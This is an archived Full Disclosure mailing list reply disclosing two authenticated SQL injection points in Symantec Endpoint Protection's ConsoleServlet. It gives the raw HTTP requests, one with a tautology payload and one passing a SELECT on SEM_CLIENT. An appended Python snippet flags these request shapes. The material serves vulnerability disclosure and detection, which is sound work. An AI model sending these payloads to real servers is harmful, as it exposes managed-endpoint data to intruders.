Open Source and information security mailing list archives
Message-ID: <55BF4E5C.4040404@code-white.com>
Date: Mon, 3 Aug 2015 13:19:56 +0200
From: Markus Wulftange <markus.wulftange@...e-white.com>
To: Brandon Perry <bperry.volatile@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Symantec Endpoint Protection

Hi Brandon,

we found two injection points. One in the BinaryFileHandler class:

    POST /servlet/ConsoleServlet HTTP/1.1
    Host: 192.168.40.133:8443
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 51
    Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175

    ActionType=BinaryFile&Action=EXISTS&GUID=0'or'1'='1

And one in the ExpRecordHandler class:

    POST /servlet/ConsoleServlet HTTP/1.1
    Host: 192.168.40.133:8443
    Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175; REQUESTSIG=09E0C480920F594CBD036BD07DC9A0B13198C99E8AFD93C83A2174710122381CD74369B6A1F2A53CA3121005A65062406DCDDBDCADCE182A532F8D1C47DCC6730CA872CA488D26A8A9E0CF296B99FEC0165F757A486DC66D28012BDD15C4C0F151AFF64A8F4724161C26C2D820D3BB14C248C0E748852BE52CBEE7CC5C04E5E26B415AD471A2FD03E4151798DE7021B8
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 329

    ActionType=ExpRecord&ObjectType=SemClient&SqlQuery=SELECT+@@version+AS+CLIENT_ID,DOMAIN_ID,GROUP_ID,GROUP_IS_OU,OU_GUID,POLICY_MODE,COMPUTER_ID,HARDWARE_KEY,COMPUTER_NAME,COMPUTER_DOMAIN_NAME,DESCRIPTION,USER_NAME,FULL_NAME,USER_DOMAIN_NAME,HASH,PIN_MARK,EXTRA_FEATURE,CREATOR,CREATION_TIME,USN,TIME_STAMP,DELETED+from+SEM_CLIENT

Both require authentication. The latter does also require a request
signature REQUESTSIG, which is based on the requested parameters and a
hard-coded key.


-- 
Markus Wulftange
Senior Penetration Tester

Code White GmbH
Magirus-Deutz-Straße 18
89077 Ulm

E-Mail markus.wulftange@...e-white.com
PGP    C6D6 C18B BAB9 0089 6942 213D 7772 8552 E9F8 6F39

http://www.code-white.com

Code White GmbH
Sitz und Registergericht/Domicile and Register Court: Stuttgart,
HRB-Nr./Commercial Register No.: 749152
Geschäftsführung/Management: Dr. Helmut Mahler, Andreas Melzner, Lüder
Sachse



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
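
A defender-side check for the two request shapes described in the message above, as an added example that is not part of the original e-mail or of the vendor's code: it parses form-encoded ConsoleServlet POST bodies, as captured by a proxy or WAF log, and flags a GUID that is not a plain GUID and any ExpRecord request that carries SQL text. The function name, the GUID pattern and the benign sample body are assumptions.

```python
import re
from urllib.parse import parse_qs

# Assumption: a legitimate GUID is 32 hex digits, optionally hyphenated or braced.
GUID_OK = re.compile(r"^\{?[0-9A-Fa-f]{8}(-?[0-9A-Fa-f]{4}){3}-?[0-9A-Fa-f]{12}\}?$")


def review_console_request(body):
    """Return a list of findings for one form-encoded ConsoleServlet POST body."""
    params = parse_qs(body, keep_blank_values=True)
    action_type = params.get("ActionType", [""])[0]
    findings = []

    # BinaryFileHandler case: GUID should never contain quotes or operators.
    if action_type == "BinaryFile":
        for guid in params.get("GUID", []):
            if not GUID_OK.match(guid):
                findings.append("BinaryFile: GUID is not a plain GUID")

    # ExpRecordHandler case: the request body itself carries SQL text.
    # Flagged for review; the page does not say which queries the console sends.
    if action_type == "ExpRecord" and "SqlQuery" in params:
        findings.append("ExpRecord: SqlQuery parameter present")

    return findings


# Body taken from the first request in the message.
SAMPLE_BINARYFILE = "ActionType=BinaryFile&Action=EXISTS&GUID=0'or'1'='1"
# Constructed samples: a benign GUID lookup and a shortened ExpRecord body.
SAMPLE_BENIGN = "ActionType=BinaryFile&Action=EXISTS&GUID=0123456789ABCDEF0123456789ABCDEF"
SAMPLE_EXPRECORD = "ActionType=ExpRecord&ObjectType=SemClient&SqlQuery=SELECT+COMPUTER_NAME+from+SEM_CLIENT"

if __name__ == "__main__":
    for body in (SAMPLE_BINARYFILE, SAMPLE_BENIGN, SAMPLE_EXPRECORD):
        print(review_console_request(body) or ["no findings"], "<-", body[:60])
```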